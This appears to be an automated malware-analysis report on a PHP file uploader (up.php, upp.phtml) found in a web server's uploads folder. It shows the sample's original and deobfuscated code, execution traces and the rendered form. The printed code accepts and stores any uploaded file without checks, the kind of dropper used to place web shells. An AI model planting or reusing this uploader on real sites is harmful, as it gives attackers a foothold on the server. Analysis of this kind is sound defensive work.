PHP Malware Analysis
up.php, upp.phtml
md5: 939c4df51ec68102ee287f917b2c676b
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<!DOCTYPE html>
<html>
<body>
<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
<?php
$target_file = basename($_FILES["fileToUpload"]["name"]);
if (isset($_POST["submit"])) {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file " . basename($_FILES["fileToUpload"]["name"]) . " has been uploaded.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}Execution traces
data/traces/939c4df51ec68102ee287f917b2c676b_trace-1676245605.4822.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:47:11.380054]
1 0 1 0.000224 393512
1 3 0 0.000305 396336 {main} 1 /var/www/html/uploads/upp.phtml 0 0
2 4 0 0.000356 396336 basename 0 /var/www/html/uploads/upp.phtml 14 1 NULL
2 4 1 0.000376 396400
2 4 R ''
1 A /var/www/html/uploads/upp.phtml 14 $target_file = ''
1 3 1 0.000413 396368
0.000446 314296
TRACE END [2023-02-12 21:47:11.380323]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:59:06.214754]
1 0 1 0.000147 393464
1 3 0 0.000207 396288 {main} 1 /var/www/html/uploads/up.php 0 0
2 4 0 0.000245 396288 basename 0 /var/www/html/uploads/up.php 14 1 NULL
2 4 1 0.000260 396352
2 4 R ''
1 A /var/www/html/uploads/up.php 14 $target_file = ''
1 3 1 0.000288 396320
0.000313 314272
TRACE END [2023-02-12 23:59:06.214950]
Generated HTML code
<html><head></head><body>
<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body></html>Original PHP code
<!DOCTYPE html>
<html>
<body>
<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
<?php
$target_file = basename($_FILES["fileToUpload"]["name"]);
if(isset($_POST["submit"])) {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}
?>